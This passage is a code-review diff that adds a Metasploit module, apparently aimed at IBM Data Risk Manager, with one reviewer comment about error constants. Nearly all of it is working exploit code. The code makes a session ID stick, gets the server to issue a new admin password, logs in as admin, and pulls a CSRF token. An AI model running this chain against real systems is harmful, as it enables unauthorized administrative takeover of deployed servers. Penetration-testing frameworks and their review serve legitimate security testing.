modules/auxiliary/admin/http/ibm_drm_download.rb

```diff
@@ -0,0 +1,204 @@
+      }
+    })
+    if res && (res.code == 302)
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def create_session_id
+    # step 1: create a session ID and try to make it stick
+    session_id = Rex::Text.rand_text_alpha(5..12)
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'saml', 'idpSelection'),
+      'method' => 'GET',
+      'vars_get' => {
+        'id' => session_id,
+        'userName' => 'admin'
+      }
+    })
+    if res && (res.code = !302)
+      fail_with(Failure::Unknown, "#{peer} - Failed to \"stick\" session ID")
+    else
+      print_good("#{peer} - Successfully \"stickied\" our session ID #{session_id}")
+    end
+
+    session_id
+  end
+
+  def free_the_admin(session_id)
+    # step 2: give the session ID to the server and have it grant us a free admin password
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('', nil, nil, content_disposition = 'form-data; name="deviceid"')
+    post_data.add_part(Rex::Text.rand_text_alpha(8..15), nil, nil, content_disposition = 'form-data; name="password"')
+    post_data.add_part('admin', nil, nil, content_disposition = 'form-data; name="username"')
+    post_data.add_part('', nil, nil, content_disposition = 'form-data; name="clientDetails"')
+    post_data.add_part(session_id, nil, nil, content_disposition = 'form-data; name="sessionId"')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'user', 'login'),
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    })
+
+    unless res && (res.code == 200) && res.body[/\"data\":\"([0-9a-f\-]{36})/]
+      fail_with(Failure::Unknown, "#{peer} - Failed to obtain the admin password.")
+    end
+
+    password = Regexp.last_match(1)
+    print_good("#{peer} - We have obtained a new admin password #{password}")
+
+    password
+  end
+
+  def login_and_csrf(password)
+    # step 3: login and get an authenticated cookie
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'login'),
+      'method' => 'POST',
+      'vars_post' => {
+        'userName' => 'admin',
+        'password' => password
+      }
+    })
+    unless res && (res.code == 302) && res.get_cookies
+      fail_with(Failure::Unknown, "#{peer} - Failed to authenticate as an admin.")
+    end
+
+    print_good("#{peer} - ... and are authenticated as an admin!")
+    cookie = res.get_cookies
+    url = res.redirection.to_s
+
+    # step 4: obtain CSRF header in order to be able to make valid requests
+    res = send_request_cgi({
+      'uri' => url,
+      'method' => 'GET',
+      'cookie' => cookie
+    })
+
+    unless res && (res.code == 200) && res.body =~ /var csrfToken \= \"([0-9a-f\-]{36})\";/
+      fail_with(Failure::Unknown, "#{peer} - Failed to authenticate obtain CSRF cookie.")
```

Comment:
Most of these `fail_with` calls can use a more specific constant, such as `Failure::NoAccess`.